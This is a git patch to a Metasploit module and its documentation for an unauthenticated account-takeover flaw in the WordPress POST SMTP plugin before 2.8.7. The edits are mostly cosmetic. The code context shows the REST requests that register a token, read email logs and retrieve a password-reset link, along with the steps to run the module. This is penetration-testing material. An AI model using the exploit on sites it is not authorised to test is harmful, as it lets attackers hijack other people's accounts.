From 1906646e67789072a27c1b8ee046883a35a1abfe Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Thu, 28 Nov 2024 13:18:47 -0500
Subject: [PATCH] peer review

---
 .../admin/http/wp_post_smtp_acct_takeover.md   | 18 +++++++++---------
 .../admin/http/wp_post_smtp_acct_takeover.rb   | 12 ++++--------
 2 files changed, 13 insertions(+), 17 deletions(-)

diff --git a/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md b/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
index dc1a3ce4e821..3ba1a4f01d8c 100644
--- a/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
+++ b/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
@@ -1,10 +1,9 @@
 ## Vulnerable Application
 
-The POST SMTP WordPress plugin
-prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
-user is able to reset the password of an arbitrary user. This is done by
-requesting a password reset, then viewing the latest email logs to find
-the associated password reset email.
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
 
 ### Install
 
@@ -51,6 +50,7 @@ volumes:
 7. Enable the post-smtp plugin, select "default" for the SMTP service
   1. Complete the setup using random information, it isn't validated.
 8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+  1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
 
 
 ## Verification Steps
@@ -60,10 +60,10 @@ volumes:
 3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
 4. Do: `set rhost 127.0.0.1`
 5. Do: `set rport 5555`
-6. `set ssl false`
-7. `set username <username>`
-8. `set verbose true`
-9. `run`
+6. Do: `set ssl false`
+7. Do: `set username <username>`
+8. Do: `set verbose true`
+9. Do: `run`
 10. Visit the output URL to reset the user's password.
 
 ## Options
diff --git a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
index e96e6f31cfaa..ddf3e61a63bc 100644
--- a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
+++ b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
@@ -13,11 +13,10 @@ def initialize(info = {})
         info,
         'Name' => 'Wordpress POST SMTP Account Takeover',
         'Description' => %q{
-          The POST SMTP WordPress plugin
-          prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
-          user is able to reset the password of an arbitrary user. This is done by
-          requesting a password reset, then viewing the latest email logs to find
-          the associated password reset email.
+          The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+          escalation where an unauthenticated user is able to reset the password
+          of an arbitrary user. This is done by requesting a password reset, then
+          viewing the latest email logs to find the associated password reset email.
         },
         'Author' => [
           'h00die', # msf module
@@ -51,7 +50,6 @@ def register_token
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'connect-app'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device }
     )
     fail_with(Failure::Unreachable, 'Connection failed') unless res
@@ -82,7 +80,6 @@ def run
     print_status('Requesting logs')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'get-logs'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device }
     )
     fail_with(Failure::Unreachable, 'Connection failed') unless res
@@ -93,7 +90,6 @@ def run
     print_status("Requesting email content from logs for ID #{doc_id}")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin.php'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device },
       'vars_get' => { 'access_token' => token, 'type' => 'log', 'log_id' => doc_id }
     )